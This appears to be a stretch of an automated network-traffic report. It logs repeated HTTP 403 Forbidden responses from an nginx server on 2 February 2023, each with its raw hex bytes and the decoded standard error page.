            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:48 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:49 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:50 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:51 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:51 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:52 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:52 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:53 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:55 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:56 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:56 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:57 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:58 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:59 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:59 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:20:00 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:20:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:20:02 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:20:02 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:20:03 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:20:03 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:20:04 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:20:04 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:20:05 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
